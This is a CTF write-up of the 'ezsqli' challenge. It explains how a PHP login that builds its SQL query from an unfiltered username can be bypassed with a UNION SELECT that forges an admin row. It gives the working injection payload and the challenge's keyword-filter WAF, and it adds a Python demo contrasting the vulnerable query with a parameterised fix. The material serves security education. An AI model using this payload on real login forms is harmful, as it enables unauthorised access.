[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli

梦为马 · 2023-06-19 · 62 views


[screenshot: ezsqli_php]

[screenshot: ezsqli_php_02]


hint

<?php
//a "part" of the source code here

function sqlWaf($s)
{
    $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
    if (preg_match($filter,$s))
        return False;
    return True;
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    
    if (!isset($_SESSION['VerifyCode']))
            die("?");

    $username = strval($_POST['username']);
    $password = strval($_POST['password']);

    if ( !sqlWaf($password) )
        alertMes('damn hacker' ,"./index.php");

    $sql = "SELECT * FROM users WHERE username='${username}' AND password= '${password}'";
//    password format: /[A-Za-z0-9]/
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        $row = $result->fetch_assoc();
        if ( $row['username'] === 'admin' && $row['password'] )
        {
            if ($row['password'] == $password)
            {
                $message = $FLAG;
            } else {
                $message = "username or password wrong, are you admin?";
            }
        } else {
            $message = "wrong user";
        }
    } else {
        $message = "user not exist or wrong password";
    }
}

?>

username is not filtered at all, so we can do whatever we want with it; only password goes through sqlWaf().

At first I thought this was a GROUP BY ... WITH ROLLUP trick, but it turned out there was no way to make this condition true that way:

if ( $row['username'] === 'admin' && $row['password'] )

Then it turned out the challenge is actually very simple. The code only looks at the first row returned (fetch_assoc()), so a UNION SELECT in username can fabricate that row: its username column is 'admin' (0x61646d696e, a hex string literal, which avoids needing quotes), and its password column is whatever value we also send as password. The password only has to pass the WAF, and a single alphanumeric character does, so the loose == comparison against our forged row is satisfied and the flag is printed.

[screenshot: ezsqli_sql_03]

[screenshot: ezsqli_xml_04]

username=1'union select 1,0x61646d696e,3#&password=3&captcha=XXXX

[screenshot: ezsqli_sql_05]
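To see why the payload above works without a live target, here is an added example (my own code, not part of the original write-up or the challenge) that models the login check offline: it ports the sqlWaf() regex, builds the query the same way the PHP does, runs it against an in-memory SQLite table with constructed sample data, and applies the three checks after the query. SQLite stands in for MySQL, so the payload is written in SQLite syntax: 'admin' in place of the MySQL hex literal 0x61646d696e, and -- in place of # for the trailing comment. The table layout (id, username, password) and the admin password are assumptions.

```python
"""Offline model of the ezsqli login check, showing why the UNION payload works.

Added example, not code from the challenge or the original write-up. The users
table and the admin password are constructed; SQLite stands in for MySQL.
"""
import re
import sqlite3

# Port of the challenge's sqlWaf() regex, copied as-is (the "grand" entry
# included). The PHP pattern's "\ " is a literal space, same as here.
WAF_PATTERN = re.compile(
    r"""xml|extractvalue|regexp|copy|read|file|select|between|from|where|create"""
    r"""|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |'""",
    re.IGNORECASE,
)

# The payload from the write-up (MySQL dialect) and its SQLite equivalent.
ORIGINAL_USERNAME = "1'union select 1,0x61646d696e,3#"
SQLITE_USERNAME = "1' union select 1,'admin','3'--"
PASSWORD = "3"   # must survive sqlWaf(): a single alphanumeric character does


def hex_literal_to_str(lit: str) -> str:
    """Decode a MySQL hex string literal such as 0x61646d696e -> 'admin'."""
    return bytes.fromhex(lit[2:]).decode()


def sql_waf(s: str) -> bool:
    """True when the string passes the filter (mirrors sqlWaf)."""
    return WAF_PATTERN.search(s) is None


def make_db() -> sqlite3.Connection:
    """Constructed sample data; the attacker does not know the real admin password."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cretAdminPass')")
    conn.execute("INSERT INTO users VALUES (2, 'guest', 'guest123')")
    return conn


def build_query(username: str, password: str) -> str:
    """Exactly how the challenge interpolates both fields into the SQL string."""
    return f"SELECT * FROM users WHERE username='{username}' AND password= '{password}'"


def _check_row(rows, password: str) -> str:
    """The three checks after the query. PHP's loose == is modelled as a string
    compare; in the exploit both sides are the numeric string "3" anyway."""
    if not rows:
        return "user not exist or wrong password"
    row = rows[0]                       # fetch_assoc(): first row only
    if row["username"] == "admin" and row["password"]:
        if str(row["password"]) == password:
            return "FLAG"
        return "username or password wrong, are you admin?"
    return "wrong user"


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> str:
    """String-built query, WAF on password only: the challenge's logic."""
    if not sql_waf(password):
        return "damn hacker"
    rows = conn.execute(build_query(username, password)).fetchall()
    return _check_row(rows, password)


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Same checks, but a parameterised query: the UNION never reaches the parser."""
    if not sql_waf(password):
        return "damn hacker"
    rows = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?", (username, password)
    ).fetchall()
    return _check_row(rows, password)


if __name__ == "__main__":
    db = make_db()
    print(hex_literal_to_str("0x61646d696e"))
    print(build_query(SQLITE_USERNAME, PASSWORD))
    print("vulnerable:", login_vulnerable(db, SQLITE_USERNAME, PASSWORD))
    print("fixed:     ", login_fixed(db, SQLITE_USERNAME, PASSWORD))
```

The forged row (1, 'admin', '3') is the first and only row the UNION returns, so every branch of the original check passes even though the real admin password is never touched. With the parameterised query the whole username string is matched literally and the same input just yields "user not exist or wrong password"; the WAF on password was never the control that mattered.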

